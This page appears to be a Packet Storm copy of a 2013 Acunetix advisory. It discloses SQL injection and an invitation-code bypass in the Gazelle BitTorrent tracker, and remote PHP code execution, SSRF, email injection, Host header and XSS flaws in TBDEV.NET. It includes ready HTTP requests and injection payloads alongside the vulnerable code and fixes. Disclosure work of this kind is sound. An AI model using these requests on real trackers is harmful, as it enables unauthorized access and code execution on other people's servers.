exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Gazelle SQL Injection / TBDEV.NET Code Execution

Gazelle SQL Injection / TBDEV.NET Code Execution
Posted Oct 15, 2013
Authored by Bogdan Calin

Gazelle suffers from bypass and remote SQL injection vulnerabilities. TBDEV.NET suffers from a remote PHP code execution vulnerability.

tags | exploit, remote, php, vulnerability, code execution, sql injection
SHA-256 | 5597e1348996b8d06f84e7e9595c6350ac59a7ddfd78f4d6aa06f8fc972fe7df

Gazelle SQL Injection / TBDEV.NET Code Execution

Change Mirror Download
Hi guys,

Gazelle and TBDEV.NET are the most popular web applications used as BitTorrent trackers. A
BitTorrent tracker is an application that assists in the communication between peers using the
BitTorrent protocol.

BitTorrent trackers can be public/open where anybody can join or private (where an invitation is
required to join the site). Most private torrent trackers are based either on Gazelle or not TBDEV.NET.

All vulnerabilities reported here were automatically discovered by Acunetix WVS version 9.0 (except
the second one from Gazelle which requires manual code review).

I. Gazelle
===========
I've downloaded the Gazelle source code from http://whatcd.github.io/Gazelle/.

List of vulnerabilities:

a) SQL injection in /staffpm.php, POST parameter "level"
--------------------------------------------------------
This vulnerability requires that you have a valid user account and you can send private messages to
the staff (default settings).

Here is sample HTTP request:

POST /staffpm.php HTTP/1.1
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: session=[...]
Host: hostname
Accept: */*

action=takepost&level=@vulnerable&message=20&subject=1

The application is making the following SQL query while processing the previous HTTP request.

INSERT INTO staff_pm_conversations
(Subject, Status, Level, UserID, Date)
VALUES
('1', 'Unanswered', @vulnerable, 2, '2013-07-18 14:51:25')

The vulnerable code is in file
Gazelle-master\sections\staffpm\takepost.php, line 6.

The source code is:
if ($Message = db_string($_POST['message'])) {
if ($Subject = db_string($_POST['subject'])) {
// New staff PM conversation
$Level = db_string($_POST['level']);
$DB->query("
INSERT INTO staff_pm_conversations
(Subject, Status, Level, UserID, Date)
VALUES
('$Subject', 'Unanswered', $Level, ".$LoggedUser['ID'].", '".sqltime()."')"
);

The $_POST['level'] variable is sanitized using db_string but it's not placed between quotes.
Therefore is vulnerable to SQL injection.

A simple solution would be to place the $Level variable between quotes:
('$Subject', 'Unanswered', '$Level', ".$LoggedUser['ID'].", '".sqltime()."')"

b) Invitation system bypass
--------------------------------------------------------
If you configure Gazelle not to accept open registrations and to require an invitation code (as all
private trackers do) it's possible to bypass this protection and register without a valid invitation
code.

The vulnerable code is in file
\Gazelle-master\sections\register\index.php

Portions of the code:

...
} elseif (OPEN_REGISTRATION || !empty($_REQUEST['invite'])) {
...

if ($_POST['invite']) {
$DB->query("
SELECT InviterID, Email
FROM invites
WHERE InviteKey = '".db_string($_REQUEST['invite'])."'");
if (!$DB->has_results()) {
$Err = 'Invite does not exist.';
$InviterID = 0;
} else {
list($InviterID, $InviteEmail) = $DB->next_record();
}
} else {
$InviterID = 0;
}
}

if (!$Err) {
$torrent_pass = Users::make_secret();
...

In the beginning the code checks for the presence of the $_REQUEST['invite'] variable. It only
continues if such variable is present.

However, a few lines bellow it's using the $_POST['invite'] and is validating the invitation code
only if $_POST['invite'] is present. It's possible to make a request that has the
$_REQUEST['invite'] variable but doesn't have the $_POST['invite'] variable. The $_REQUEST variable
is an associative array that by default contains the contents of $_GET, $_POST and $_COOKIE.
Therefore is possible to make a request with $_GET['invite'] or with $_COOKIE['invite'] and bypass
the protection.

An example with $_COOKIE['invite']:

POST /register.php HTTP/1.1
Accept-Encoding: gzip,deflate
Accept: */*
Host: hostname
Cookie: invite=1

username=username&email=sample@gmail.com&password=password&confirm_password=password&readrules=true&readwiki=true&agereq=true&submit=1

This HTTP request is bypassing the protection and the user is registered.

The solution is to either use everywhere $_POST or $_REQUEST.

Both these problems were reported and fixed by Gazelle developers. The latest version is not vulnerable.

II. TBDEV.NET
===============
I've downloaded the TBDEV source code from https://sourceforge.net/p/tbdevnet/.

List of vulnerabilities:

a) Improper session termination leading to remote PHP code execution

The scanner found a possible problem with the reputation_settings.php file.
This page redirects the browser but still returns an HTML body with forms.
This is usually happening when the session is not properly terminated by terminating the script.

Looking at the code (reputation_settings.php) we see that really there is a problem here:

...
if ( get_user_class() < UC_ADMINISTRATOR )
header( "Location: {$TBDEV['baseurl']}/index.php" );

$rep_set_cache = "cache/rep_settings_cache.php";

if ( 'POST' == $_SERVER['REQUEST_METHOD'] )
{
unset($_POST['submit']);
//print_r($_POST);
rep_cache();
exit;
}

...

The code checks if the user is an administrator and if that's not the case it redirects the user to
the index page. This works if you are using a browser to visit the page. However, the scripts
doesn't terminate and still executes the remaining lines of code. The following lines of code write
some of the user input to a .PHP file leading to remote code execution.

To exploit this vulnerability you make a request like:

POST /reputation_settings.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3vkijo13v6skf24espfl72v8r5; tbalpha_uid=2; tbalpha_pass={hash}
Host: hostname
Content-Length: 246

'%2bphpinfo()%2b'a=1,rep_adminpower=5&rep_default=10&rep_is_online=0&rep_kppower=100&rep_maxperday=10&rep_minpost=50&rep_minrep=10&rep_pcpower=1000&rep_rdpower=365&rep_repeat=20&rep_undefined=is%20off%20the%20scale&rep_userrates=5&submit=Submit

This HTTP request will return with a message "Reputation Settings Have Been Updated!" and update the
reputation settings file.

Therefore, the file cache/rep_settings_cache.php will now contain our PHP code.
...
<?php

$GVARS = array(
''+phpinfo()+'a' => 1,
'rep_default' => 10,

...

This file is included in reputation.php so visiting the URL http://hostname/reputation.php will show
the phpinfo page.

To learn more about this type of vulnerabilities read this page
http://www.acunetix.com/blog/web-security-zone/html-form-found-in-redirect-page/

To fix this problem you must terminate the script instead of just redirecting the user.

b) Server Side Request Forgery (/takeprofedit.php)
Server Side Request Forgery is a vulnerability that allows an attacker to force server interfaces
into sending packets initiated by the victim server to another servers.
The scanner set the URL encoded POST input avatar to a remote URL (http://hitxfHcA6ztoB.bxss.me/)
and a HTTP request was initiated to this domain which indicates that this script is vulnerable to
SSRF (Server Side Request Forgery).

c) Email Injection (/email-gateway.php)
Email injection is a security vulnerability that allows malicious users to send email messages using
someone else's server without prior authorization.
By manipulating the POST input subject is possible to inject various mail headers like bcc:
emailaddress and so on.

d) Host header attack (/bitbucket-upload.php)
An attacker can manipulate the Host header as seen by the web application and cause the application
to behave in unexpected ways. Developers often resort to the exceedingly untrustworthy HTTP Host
header (_SERVER["HTTP_HOST"] in PHP).
Host header evilhostdmBBPBJQ.com was reflected inside a FORM tag (action attribute).

e) Various Cross Site Scripting vulnerabilities:

Filename: /forums.php
URL encoded GET input keywords was set to 1' onmouseover=prompt(960142) bad='
The input is reflected inside a tag parameter between single quotes.

Filename: /login.php
URL encoded GET input returnto was set to 1' onmouseover=prompt(978763) bad='
The input is reflected inside a tag parameter between single quotes.

Filename: /redir.php
URL encoded GET input url was set to javascript:prompt(988296);
The input is reflected inside a META refresh parameter.

I've tried to report these problems on many ocassions/places but didn't received any response.

On 7/18/2013 I've posted the following bug report to the tbdevnet project but didn't received any
response. https://sourceforge.net/p/tbdevnet/bugs/5/

This article was originally posted on
http://www.acunetix.com/blog/news/critical-vulnerabilities-discovered-gazelle-tbdev-net/

--
Bogdan Calin - bogdan [at] acunetix.com
CTO
Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog
Follow us on Twitter - http://www.twitter.com/acunetix
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close